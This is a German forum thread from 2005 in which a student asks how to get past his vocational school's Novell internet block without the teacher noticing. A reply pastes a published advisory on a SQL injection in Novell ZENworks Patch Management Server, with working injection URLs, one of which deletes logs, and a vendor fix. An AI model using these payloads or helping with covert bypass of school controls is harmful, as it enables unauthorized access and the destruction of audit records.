Wie kann ich in novel knacken??????

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von marsi87, 2. November 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 2. November 2005
    Hab ein problem in meiner Berufsschule ist im in der Textverarbeitung so was von langweilig aber das Internet ist gesperrt wie kann ich aber trotzdem mich ins Internet hacken ohne das mein lehrer es merkt??
     
  3. 2. November 2005
    1.) heist es novell
    2.) w00t
    3.)

    Code:
    Summary
ZENworks Suite "automates and enforces business and IT managment processes across the lifecycle of desktops, laptops, servers and handhelds to control costs, ensure security and compliance, optimize the value of IT assets across diverse server and client platforms".

The Novell ZENworks Patch Management Server is vulnerable to SQL injection in the management console.

Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.cirt.dk/advisories/cirt-39-advisory.pdf

Details
Vulnerable Systems:
* Novell ZENworks Patch Management Server version 6.0.0.52

Immune Systems:
* Novell ZENworks Patch Management Server 6.2.2.181 or newer

Proof of Concept:
http://192.168.1.10/computers/default.asp?...irection=';

Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, @Search = ', @groupFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=';StatusFilter=ERRR &computerFilter=187&impactFilter=29&saveFilter=save&Page=rep

Response from server: Incorrecy syntax near ', @delimiter='.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=';&computerFilter=187&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=ERRR&computerFilter=';&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

Exploitation examples:
http://192.168.1.10/computers/default.asp?...rection=;select *+from+testclient.master.dbo.sysobjects

http://192.168.1.10/computers/default.asp?...rection=;select *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS. [2]

http://192.168.1.10/computers/default.asp?...rection=;SELECT name+FROM+sysobjects+WHERE+xtype+=+"U"

http://192.168.1.10/computers/default.asp?...rection=;select *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS.

Solution:
Upgrade to ZENworks Patch Management version 6.2.2.181 (or newer hot fix via your PLUS server) found at http://download.novell.com.
     
  4. 3. November 2005
    aha und geht das auf deutsch auch
     
  5. 3. November 2005
    SQL injection <- -> google !
    sicher das es novell is oder suse ?? ist ja jetzt ineinander verschachtelt, was wie und wo sag ich nich *gg* weil ichs nicht mit sicherheit weiss
     
  6. 3. November 2005
    kurz gesagt gibt es kein 1 klick lamer tool womit du ein (!) novell ownen kannst..entweder du kennst dichn bissle damit aus oder du lässt des !


    mfg moep
     
  7. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.